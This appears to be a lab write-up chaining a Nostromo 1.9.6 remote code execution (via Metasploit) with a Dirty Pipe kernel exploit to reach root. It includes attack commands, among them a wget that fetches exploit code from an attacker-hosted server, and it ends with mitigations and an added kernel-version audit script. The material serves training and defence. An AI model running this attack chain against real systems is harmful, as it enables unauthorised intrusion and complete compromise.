Remote Code Execution – Nostromo Exploit to Root via Dirty Pipe | Glitch

Overview

This lab focuses on exploiting a vulnerable Nostromo web server to gain initial access and then leveraging a Linux kernel vulnerability to escalate privileges to root.

The attack chain demonstrates how outdated services combined with vulnerable kernels can lead to full system compromise.


Objective

  • Perform service enumeration
  • Identify vulnerable web server
  • Exploit Nostromo RCE vulnerability
  • Escalate privileges using a kernel exploit

Reconnaissance

Nmap Scan

nmap -sV goldnertech.hv

Result:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian
80/tcp open  http    nostromo 1.9.6

The target is running Nostromo 1.9.6, which is known to be vulnerable.

Vulnerability Identification

Search for available exploits:

searchsploit nostromo

Result:

nostromo 1.9.6 - Remote Code Execution

Associated vulnerability:

  • CVE-2019-16278: Nostromo Directory Traversal → RCE

Exploitation

Metasploit Exploit

msfconsole
search nostromo
use exploit/multi/http/nostromo_code_exec

Set required parameters:

set RHOSTS goldnertech.hv
set LHOST <your_ip>

Check target:

check

Run exploit:

exploit

Initial Access

whoami

www-data

We now have a low-privileged shell.

Privilege Escalation

Kernel Enumeration

uname -a

Linux debian 5.11.0-051100-generic

This kernel version is vulnerable to:

  • CVE-2022-0847 (Dirty Pipe)

Stabilizing Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Preparing Exploit

On attacker machine:

nano exploit.c

Host the file:

python3 -m http.server 8000

On target machine:

cd /tmp
wget http://<attacker_ip>:8000/exploit.c

Compile exploit:

gcc exploit.c -o exploit

Identify SUID Binaries

find / -perm -4000 2>/dev/null

Example Output:

/usr/bin/su
/usr/bin/passwd
/usr/bin/mount

Exploiting Dirty Pipe

Run exploit with a SUID binary:

./exploit /usr/bin/su

Root Access

whoami

root

Privilege escalation successful.

Proof of Exploitation

  • Initial foothold via Nostromo RCE
  • Shell obtained as www-data
  • Kernel exploit executed successfully
  • Root shell obtained

Impact

  • Remote code execution via vulnerable web server
  • Full privilege escalation using kernel exploit
  • Complete system compromise

Mitigation

  • Upgrade Nostromo to a secure version
  • Apply kernel patches (Dirty Pipe fix)
  • Restrict exposure of web services
  • Monitor for abnormal process execution
  • Follow least privilege principles

Real-World Insight

Nostromo is a lightweight web server that is often overlooked during patch management. Vulnerabilities like CVE-2019-16278 allow attackers to gain immediate footholds. Kernel-level exploits such as Dirty Pipe are especially dangerous because they bypass traditional privilege boundaries and lead directly to root access.

Key Takeaways

  • Always check service versions for public exploits
  • RCE vulnerabilities often provide quick entry points
  • Kernel exploits can turn low access into full control
  • Chaining vulnerabilities is key in real-world attacks
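
For the "Apply kernel patches (Dirty Pipe fix)" mitigation, a patch audit can classify the release string reported by uname, such as the 5.11.0-051100-generic seen in this lab. This is an added example, not part of the original post. The helper name dirtypipe_status is hypothetical, and the version boundaries are the upstream ones (bug introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11), which the post itself does not list.

```sh
#!/bin/sh
# Added example: classify a kernel release string against the upstream
# Dirty Pipe (CVE-2022-0847) range. Boundaries are the upstream ones:
# introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11.
# Assumption: the string carries the upstream x.y.z version. Distro kernels
# may backport the fix without changing x.y.z, so "affected" means
# "confirm against the vendor advisory".
# dirtypipe_status is a hypothetical helper name.
# Usage: dirtypipe_status "$(uname -r)"

dirtypipe_status() {
    ver=${1%%-*}                 # drop "-051100-generic" style suffixes
    ver=${ver%%+*}
    case $ver in
        *.*) ;;
        *) echo unknown; return 0 ;;
    esac
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    case $rest in
        *.*) patch=${rest#*.}; patch=${patch%%.*} ;;
        *)   patch=0 ;;          # "5.11" with no patch level
    esac
    # Every component must be plain digits, otherwise refuse to guess
    for n in "$major" "$minor" "$patch"; do
        case $n in
            ''|*[!0-9]*) echo unknown; return 0 ;;
        esac
    done
    # Kernels older than 5.8 predate the bug
    if [ "$major" -lt 5 ] || { [ "$major" -eq 5 ] && [ "$minor" -lt 8 ]; }; then
        echo not-affected; return 0
    fi
    # 5.17 and later were released with the fix included
    if [ "$major" -gt 5 ] || [ "$minor" -ge 17 ]; then
        echo not-affected; return 0
    fi
    # Only these stable branches received the fix; others in range did not
    case $minor in
        10) fixed=102 ;;
        15) fixed=25 ;;
        16) fixed=11 ;;
        *)  echo affected; return 0 ;;
    esac
    if [ "$patch" -ge "$fixed" ]; then echo not-affected; else echo affected; fi
}
```

Debian's stock kernels report an ABI name such as 5.10.0-11-amd64 rather than the upstream patch level, so an "affected" result there has to be confirmed against the installed package version.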
This post is licensed under CC BY 4.0 by the author.